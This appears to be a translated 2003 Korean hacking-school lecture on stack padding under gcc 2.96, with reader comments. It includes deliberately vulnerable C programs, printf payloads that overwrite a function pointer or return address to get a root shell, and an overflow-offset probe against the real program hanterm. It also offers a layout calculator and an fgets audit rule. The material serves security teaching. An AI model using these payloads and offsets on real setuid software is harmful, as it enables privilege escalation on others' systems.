   ttongfly
   http://ttongfly.realskulls.org
   Wonjae's dad's lecture on the buffer layout under gcc 2.96.

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=68


Most of the documents I have posted below are lectures written for
environments with gcc compiler version 2.95 or below. So if you want to
practise buffer overflows on a system where gcc 2.96 or later is installed,
some things will differ from what the documents show.
The document below explains how to deal with that.
The recommended way to learn is to study buffer overflows first on a gcc 2.95
(or lower) system, and only then learn how to apply them on gcc 2.96 and later.
For reference, F.T.Z uses gcc 2.95 or lower, so you can study there without
being bothered by the changed buffer layout. If you want to practise at home
or on another server, you can get the old gcc version by going through the
following steps.

1. Check the gcc version on my server.
    [root@hancom root]# gcc -v
    Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
    gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
    [root@hancom root]#
    --> So it is 2.96 or later.

2. Find out which package the gcc program belongs to.
    [root@hancom root]# rpm -qf /usr/bin/gcc
    gcc-2.96-99hl
    [root@hancom root]#
    --> Removing this package removes gcc with it, right?

3. Remove that package.
    [root@hancom root]# rpm -e gcc-2.96-99hl --nodeps
    [root@hancom root]#

4. Install the older gcc (the older gcc is shipped in the egcs package).

   [Download] <- egcs-1.1.2 package

   <Install>
    [root@hancom egc]# rpm -ivh egcs-1.1.2-30.i386.rpm --nodeps --force
    Preparing...            ########################################### [100%]
    1:egcs                   ########################################### [100%]
    [root@hancom egc]#

5. Verify
    [root@hancom egc]# gcc -v
    Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
    gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
    [root@hancom egc]#  
    --> Yay, now it is 2.91.
  
6. To get the original gcc back, do the reverse: uninstall egcs and then
   install gcc-2.96-99hl again, right?
   [root@hancom egc]# rpm -e egcs-1.1.2-30 --nodeps
   [root@hancom egc]# mount /dev/cdrom
   [root@mongii /root]# rpm -ivh /mnt/cdrom/RedHat/RPMS/gcc-2.96-99hl.i386.rpm
   gcc                         ##################################################
   [root@hancom root]# gcc -v
   Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
   gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
   [root@hancom root]#

* Oops. There is one thing I forgot. You do not have to install the older gcc:
  there is a separate option that compiles with the old buffer layout.
  ex) gcc -o test test.c -mpreferred-stack-boundary=2
  With the option above, even gcc 2.96 or later compiles to the buffer shape of
  2.95 and below. If you are setting up a test or public hacking server, or it
  is inconvenient to pass the option every time, use the method explained first.


---------------------------------------------------------------------------

Buffer layout under GCC version 2.96                                      -. hackerleon in Null@Root

Red Hat 7.0 and later ship gcc 2.96.
Programs compiled with gcc 2.96 show a changed buffer layout..
In this article I want to work out the buffer layout under gcc 2.96.

A while ago NaNu9 posted on my homepage, among the frame-pointer topics, a study of the problems under gcc version 2.96^^ Thanks!! Building on those findings, I want to look at how this applies to existing vulnerable programs, what the memory layout under gcc 2.96 looks like, and how it can be applied to BOF or FSB.
First, post #470 in the Q&A section of http://hackerleon.cybersoldier.net is taken as the basic premise.

Let us compile the following identical source with gcc 2.91 and with gcc 2.96.


//test1.c
#include "dumpcode.h"   /* hex-dump helper used throughout this lecture */
#include <stdio.h>

int main(void)
{
    char buf2[12];
    char buf[20];
    fgets(buf, 128, stdin);   /* bound larger than buf on purpose: this is the layout probe */
    printf("buf1:%x , buf2:%x, %d\n", (unsigned int)buf, (unsigned int)buf2, (int)(buf2 - buf));
    dumpcode((char *)buf, 64);   /* dump 64 bytes starting at buf */
    return 0;
}

With test1 we look at the memory layout of the program compiled with gcc 2.96 and with gcc 2.91.
First the result under gcc 2.91.

$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$ gcc test1.c -o test1
$./test1
a
buf1:bffffa98 , buf2:bffffaac, 20
0xbffffa98  61 0a 00 40 34 97 04 08 60 ae 00 40 04 fb ff bf   a..@4...`..@....
0xbffffaa8  b8 fa ff bf 4b 84 04 08 20 97 04 08 34 97 04 08   ....K... ...4...
0xbffffab8  d8 fa ff bf cb 29 03 40 01 00 00 00 04 fb ff bf   .....).@........
0xbffffac8  0c fb ff bf 68 38 01 40 01 00 00 00 b0 83 04 08   ....h8.@........


We have seen the result above many times; it is the expected one. Diagrammatically:

[buf(20)][buf2(12)][ebp(4)][ret]

It can be inferred easily without even taking a dump.

Now the result under gcc 2.96.

$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test1.c -o test1
$./test1
a
buf1:bfffefa0 , buf2:bfffefc0, 32
0xbfffefa0  61 0a 00 40 a8 ca 13 40 44 f0 ff bf ce 6b 12 40   a..@...@D....k.@
0xbfffefb0  e8 ef ff bf 20 d0 00 40 50 83 04 08 a8 ca 13 40   .... ..@P......@
0xbfffefc0  44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08   D...Dc.@........
0xbfffefd0  18 98 04 08 fc 98 04 08 18 f0 ff bf fc bb 03 40   ...............@

This result is very strange. The distance from buf to buf2 came out as 32 bytes..
and the memory layout itself shows a very odd arrangement.. Diagrammatically:

[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]

You can see dummies (a name I chose arbitrarily) inserted between the regions of memory..

So under gcc 2.96 the memory layout is made hard to figure out...
On a boring summer evening with nothing else to do, I did a bit of grunt work and found an interesting regularity.

I varied the sizes of buf and buf2 in test1 and computed the distance from buf to buf2 each time.

[image: http://hackerleon.cybersoldier.net/images/gcc296.jpg]

- See Table 1 -

Looking at Table 1.. (I really must have had nothing to do^^)
the size of buf steps through multiples of 16, and for sizes between one multiple of 16 and the next, the distance comes out as that next multiple of 16, provided buf2 is 12 bytes or more..
That is... in test1, buf is 20 bytes, so it lies in the range 16 < buf <= 32, and therefore the distance to buf2 is "32".

Now let us pick a buf size arbitrarily and compute the distance to buf2..
buf=200
buf2=12
Since 16x12=192 and 16x13=208, buf lies in the range 192 < buf <= 208, so if the idea above is right the distance should come out as 208.

Hmm... let us change the size of buf and run it to see whether this idea holds.

//test2.c
#include <stdio.h>

int main(void)
{
    char buf2[12];
    char buf[200];
    fgets(buf, 224, stdin);   /* bound larger than buf on purpose: this is the layout probe */
    printf("buf1:%x , buf2:%x, %d\n", (unsigned int)buf, (unsigned int)buf2, (int)(buf2 - buf));
    return 0;
}

$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test2.c -o test2
$./test2
a
buf1:bfffeef0 , buf2:bfffefc0, 208

Indeed, the idea was right...

So even under gcc 2.96, as long as the source does not limit the input to the variable, we can infer the memory layout of a vulnerable program and attack it...^^

Next let us look at the shape from buf2 up to ret..

Result from test1

[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]

This is what it looked like.. We have already found the length of the dummy between buf and buf2... now let us also find the distance from buf2 to ret...

It seems to be the same story again..^^

Let us look at test3

//test3.c
#include "dumpcode.h"
#include <stdio.h>

int main(void)
{
    char buf[20];
    fgets(buf, 64, stdin);
    dumpcode((char *)buf, 64);   /* dump buf and the bytes above it, up to and past ret */
    return 0;
}

$./test3
a
0xbfffefb0  61 0a 00 bf 20 d0 00 40 50 83 04 08 a8 ca 13 40   a... ..@P......@
0xbfffefc0  44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08   D...Dc.@........
0xbfffefd0  d0 97 04 08 b4 98 04 08 18 f0 ff bf fc bb 03 40   ...............@
0xbfffefe0  01 00 00 00 44 f0 ff bf 4c f0 ff bf 66 83 04 08   ....D...L...f...

Checking ret with gdb here, the ret value came out as 0x4003bbfc; therefore
ret is at 0xbfffefdc.
Here too, as computed before, we can see that the dummy is created based on the maximum of the 16-multiple range that the buffer's size falls into..

buf is 20, so it lies in the range 16 < buf <= 32, and therefore the distance from buf to dummy3 is 32.

To summarize:

[buf(20) ----> 32(20+12)][dummy3(8)][ebp(4)][ret]

Haha... the distance to ret can be computed and inferred as well...


Now let us compile a real BOF problem with gcc 2.96 and check whether our reasoning is right.

//test4.c
#include <stdio.h>
#include <unistd.h>   /* setreuid */

void printit() {
    printf("Hello there!\n");
}

int main(void)
{
    int crap;
    void (*call)() = printit;   /* function pointer that sits above buf on the stack */
    char buf[20];
    fgets(buf, 50, stdin);      /* the bug: 50-byte bound on a 20-byte buffer */
    setreuid(0, 0);
    call();
    return 0;
}

A source you have seen many times somewhere^^ (mainsourece newbie problem #13)

Under gcc 2.91 the address used to call printit comes right after buf(20), so after launching egg and entering [20][egg] you would have got a shell immediately...
So what about the one compiled with gcc 2.96... Going by what we studied above..

First, buf is 20 bytes, so it lies in the range 16 < buf <= 32, and therefore the distance from buf to dummy3 is 32..
dummy3 is 8 bytes, as we saw above, so the distance to the address used to call printit is 32+8 = 40 bytes.

So the attack should be [40][egg].. Let us check whether that is right.

egg:0xbffffa78

$(printf "AAAA...(40)\x78\xfa\xff\xbf";cat)\./test4

id
uid=500(leon) gid=(500)leon euid=0(root)

It works...

Now let us solve a problem where the return address is modified.

//test5.c
#include <stdio.h>

int main(void)
{
    char buf[20];
    printf("name :");
    fgets(buf, 50, stdin);   /* the bug: 50-byte bound on a 20-byte buffer */
    printf("Hi %s", buf);
    return 0;
}
Likewise, under 2.91 the layout after launching egg is [20][ebp][ret], so...
the attack would be [24][&egg]. But under 2.96, applying what we found above:
buf is 20 bytes, so 16 < buf < 32; therefore the distance from buf to dummy3 is 32 bytes, dummy3 is 8 bytes and sfp is 4 bytes, giving..

[20][12][8][4] => we should attack with [44 bytes][egg]. So..

egg:0xbffffa78

$(printf "AAAA...(44)\x78\xfa\xff\xbf";cat)\./test4

id
uid=500(leon) gid=(500)leon euid=0(root)

Works again^^.

Now, while we are at it, let us apply this to "hanterm", the poster child for bugs in commercial programs.

First, under gcc 2.91:

$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$hanterm -fn `perl -e "print 'a'x88"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~(omitted)~~aaaaaaa
세그멘테이션 오류 (Segmentation fault)

The segfault came at 88 bytes, so we can infer [84][fsb][ret] and attack it.

So what happens under 2.96... let us infer the buffer..
The variable for the -fn option (call it 'buf' for convenience) is 84 bytes, so..

16x5=80 < buf < 16x6=96

Therefore the distance from buf to dummy3 is 96 bytes. Hence

the calculation gives [96][8][4][ret].. That is, the first segfault should come at 108. Let us see whether that is really so..

$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)

$hanterm -fn `perl -e "print 'a'x107"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~(omitted)~~aaaaaaaaaaaaaaaa

$hanterm -fn `perl -e "print 'a'x108"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~(omitted)~~aaaaaaaaaaaaaaaaa
세그멘테이션 오류 (Segmentation fault)

Just as expected...^^
So hanterm under 2.96 can be attacked as well.


Through a few examples we have become able to infer the relative positions in memory under gcc 2.96 too...

But here..

there is one very important point..

That is, if the input limit of fgets is set small, you cannot overflow.

So for gcc 2.96 we can summarize as follows.

1. The distance between variable 1 and variable 2 is the next multiple of 16 at or above the size of variable 1 (provided variable 2 is 12 bytes or more).

2. Where the variable definitions end, dummy3 (8 bytes) is allocated.

3. If the input range of a variable is kept at or below the multiple of 16 the variable falls under, no bug due to BOF occurs.
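The three rules above written out as a small layout calculator; this is an added example, not code from the original article or from hackerleon. It reproduces the offsets measured in test1, test2, test4, test5 and the hanterm run, and checks an fgets bound against the ret slot under each layout. The model assumes buf is the last-declared local and that a char array following it is at least 12 bytes, as rule 1 requires.

```c
#include <stddef.h>
#include <stdio.h>

/* Model of the two stack layouts compared in the article.  Offsets are
 * measured from the start of buf:
 *   GCC_291: [buf][ebp(4)][ret]
 *   GCC_296: [buf][pad to a multiple of 16][dummy3(8)][ebp(4)][ret]
 * Assumption (not stated in the article): buf is the last-declared local,
 * and any char array following it is at least 12 bytes, as rule 1 needs. */
enum compiler { GCC_291, GCC_296 };

/* Round up to the next multiple of 16: 16 -> 16, 20 -> 32, 84 -> 96. */
static size_t round16(size_t n) { return (n + 15) & ~(size_t)15; }

/* Rule 1: distance from buf to the next char array (buf -> buf2). */
size_t next_array_offset(enum compiler cc, size_t bufsize) {
    return cc == GCC_296 ? round16(bufsize) : bufsize;
}

/* Rule 2: first 4-byte slot after buf once the padding and dummy3(8) are
 * skipped.  In test4 that slot holds the `call` pointer (offset 40);
 * in test5 it holds the saved ebp. */
size_t first_slot_after_buf(enum compiler cc, size_t bufsize) {
    return cc == GCC_296 ? round16(bufsize) + 8 : bufsize;
}

/* The saved return address sits one 4-byte slot past the saved ebp. */
size_t ret_offset(enum compiler cc, size_t bufsize) {
    return first_slot_after_buf(cc, bufsize) + 4;
}

/* fgets(buf, n, stdin) writes at most n bytes (n-1 chars plus NUL), i.e.
 * offsets [0, n).  Does that window overlap the 4-byte ret slot? */
int fgets_can_reach_ret(enum compiler cc, size_t bufsize, size_t n) {
    return n > ret_offset(cc, bufsize);
}

/* The audit rule that holds on every layout: n must not exceed sizeof buf.
 * Rule 3 (n <= the 16-multiple) only hides the bug on gcc 2.96. */
int fgets_bound_is_safe(size_t bufsize, size_t n) { return n <= bufsize; }

int main(void) {
    printf("buf[20]: ret at %zu (2.91) / %zu (2.96)\n",
           ret_offset(GCC_291, 20), ret_offset(GCC_296, 20));
    printf("fgets(buf,32) on buf[20] reaches ret: 2.91=%d 2.96=%d\n",
           fgets_can_reach_ret(GCC_291, 20, 32),
           fgets_can_reach_ret(GCC_296, 20, 32));
    return 0;
}
```

The bound rule 3 describes is specific to gcc 2.96: fgets(buf, 32, stdin) on a 20-byte buf cannot reach ret there, but does under 2.91, so the portable audit rule remains n <= sizeof buf.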


Somewhat haphazardly, we have looked at how this applies to vulnerable programs under gcc 2.96..

It should be useful for computing the ret value of an FSB compiled with gcc 2.96, for finding ret in a BOF, and so on; it would be good to see more research done on it...

  Hit : 13122     Date : 2003/09/19 11:46



    
Farcen Ah... this is hard... I think I need to understand dumpcode.h first 2003/09/21
wonjae190 Wonjae's dad....,ㅡ.ㅡ Dad! 2003/10/15
allnude When I enter hanterm -fn 'perl -e "print 'a'x88"' it does not come out as in the post above; instead it prints can't load english font perl -e "print ax88" like this 2003/12/03
allnude Why is that? I am currently on WowLinux 7.3 and gcc is 2.95.4. I get the same result as with 2.91. 2003/12/03
allnude Of course I ran egg too.. (#47 here) 2003/12/03
tinlove21 I really enjoyed reading this. Thanks ㅋ Good information, it helped a lot^^ 2005/01/11
kim0237 Hmm... I really like Linux ㅡ.ㅠ 2006/06/19
cjy9306 Ugh, no matter how much I look, I do not get it.. 2010/01/07
chlckdghsla I do not get it...ㅠㅠ where should I start studying over again 2012/09/21